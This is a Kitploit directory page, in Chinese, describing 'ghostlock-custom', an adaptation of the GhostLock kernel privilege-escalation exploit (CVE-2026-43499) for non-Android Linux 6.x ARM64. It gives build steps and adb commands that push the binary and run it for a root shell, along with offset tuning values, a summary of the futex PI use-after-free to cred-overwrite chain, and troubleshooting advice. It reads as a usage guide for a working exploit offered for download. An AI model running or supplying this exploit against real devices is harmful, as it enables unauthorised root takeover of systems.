Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
ghostlock-custom — GhostLock(CVE-2026-43499)针对非 Android 的 Linux 6.x ARM64 的适配版本 | Kitploit
工具/GitHubGitHub/xiaobailovesstirring/ghostlock-custom
权限提升漏洞分析漏洞利用二进制利用
GitHubxiaobailovesstirring/ghostlock-custom

ghostlock-custom

GhostLock(CVE-2026-43499)针对非 Android 的 Linux 6.x ARM64 的适配版本

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
71个月前尚未审核

GhostLock Custom — CVE-2026-43499 适配版

针对 非 Android Linux 6.x ARM64 内核的 GhostLock (CVE-2026-43499) 提权利用。

内核特征

项目值
架构ARM64 (AArch64)
VA_BITS39
KIMAGE_TEXT_BASE0xffffffc008000000
内核版本6.x
SELinux无
ashmem无
configfs无

编译

本地编译 (需要交叉编译器)

make

Android NDK 编译

make android-arm64 NDK=/path/to/android-ndk

GitHub Actions (云端编译)

推送后自动触发编译,下载 artifact 即可。

使用

# 推送到目标设备
adb push ghostlock-arm64 /data/local/tmp/e
adb shell chmod 755 /data/local/tmp/e

# 获取 root shell
adb shell /data/local/tmp/e --shell

# 调整 pselect 偏移 (如果默认值不工作)
adb shell PSELECT_SHIFT=-4 /data/local/tmp/e --shell
adb shell PSELECT_SHIFT=-2 /data/local/tmp/e --shell
adb shell PSELECT_SHIFT=0 /data/local/tmp/e --shell
adb shell PSELECT_SHIFT=2 /data/local/tmp/e --shell
adb shell PSELECT_SHIFT=4 /data/local/tmp/e --shell

# 指定物理加载地址
adb shell KPHYS=0x80000000 /data/local/tmp/e --shell

环境变量

变量默认值说明
PSELECT_SHIFT-2pselect waiter 在栈上的偏移调整
KPHYS0x80000000内核物理加载地址
KIMAGE_TEXT_BASE0xffffffc008000000内核虚拟基址

提权原理

  1. futex PI 竞态: FUTEX_CMP_REQUEUE_PI 触发 remove_waiter() 的 UAF
  2. pselect 栈覆盖: 释放的 rt_mutex_waiter 落在 stack_fds 缓冲区
  3. PI 树写入: 通过构造的 fake waiter 实现任意内核地址写入
  4. cred 覆写: 将 task_struct->cred 覆写为 init_cred

适配说明

此版本基于 ghostlock-oneplus 精简:

  • 移除 SELinux 禁用代码 (本内核无 SELinux)
  • 移除 ashmem/configfs 相关代码 (本内核无这些组件)
  • 移除 KernelSU 安装代码
  • 移除 SLIDE KASLR 泄露 (无 loggers/nfulnl_logger)
  • 移除 Android 专用代码 (miniADB 等)

故障排除

现象可能原因解决方法
设备重启PSELECT_SHIFT 错误从 -4 到 +4 逐个尝试
无效果KPHYS 错误确认 /proc/iomem 中的正确值
perf_event_open failedseccomp 限制尝试通过 ADB shell 运行
无 root偏移量不匹配确认内核版本,检查 TASK_CRED_OFF

免责声明

本工具仅供安全研究使用。使用者需自行承担所有责任。

下载工具